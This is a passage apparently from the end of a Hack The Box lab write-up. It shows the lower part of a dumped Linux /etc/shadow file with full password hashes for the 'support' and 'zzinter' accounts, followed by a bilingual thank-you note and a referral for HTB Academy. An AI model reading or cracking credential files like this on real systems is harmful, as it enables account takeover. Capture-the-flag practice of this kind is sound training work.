games:*:19579:0:99999:7:::
man:*:19579:0:99999:7:::
lp:*:19579:0:99999:7:::
mail:*:19579:0:99999:7:::
news:*:19579:0:99999:7:::
uucp:*:19579:0:99999:7:::
proxy:*:19579:0:99999:7:::
www-data:*:19579:0:99999:7:::
backup:*:19579:0:99999:7:::
list:*:19579:0:99999:7:::
irc:*:19579:0:99999:7:::
gnats:*:19579:0:99999:7:::
nobody:*:19579:0:99999:7:::
_apt:*:19579:0:99999:7:::
systemd-network:*:19579:0:99999:7:::
systemd-resolve:*:19579:0:99999:7:::
messagebus:*:19579:0:99999:7:::
systemd-timesync:*:19579:0:99999:7:::
pollinate:*:19579:0:99999:7:::
sshd:*:19579:0:99999:7:::
syslog:*:19579:0:99999:7:::
uuidd:*:19579:0:99999:7:::
tcpdump:*:19579:0:99999:7:::
tss:*:19579:0:99999:7:::
landscape:*:19579:0:99999:7:::
fwupd-refresh:*:19579:0:99999:7:::
usbmux:*:19760:0:99999:7:::
support:$6$6PVrerMoSFiInKtK$ygS.t0QznetnEX6ISXSrqdoCVALfJSqVmzZHgb5.5NvNu3lMZtLEK4euiUYZ.9Z5pOXj1RNRXSimzPQKpJF8j0:19760:0:99999:7:::
lxd:!:19760::::::
zzinter:$y$j9T$QZtFGv4zay5fhCo2.GIj0/$6yL9hvVakB27NMsfAbQpOvDgqeZj2w4dAMnpZQS9zID:19779:0:99999:7:::
_laurel:!:19928::::::

Thanks

Respect: If my writeup really helps you, Give me a respect to let me know, Thankssssss!

Beginner Recommand: If you are a beginner, please use this link to sign up for an HTB Academy to get more Higher level of knowledge.

新手非常推薦: 如果你是初學者,可以用此鏈接來嘗試注冊 HTB Academy 賬號。

使用上面的鏈接加入 HTB 的 academy 就可以免費看 Tire 0 的所有教程,這對初學者來説是很友好的。 (建議先完成 INTRODUCTION TO ACADEMY)

Join HTB’s academy with this link to get free access to all the tutorials for Tire 0. This is very beginner friendly. (It is recommended to complete INTRODUCTION TO ACADEMY first)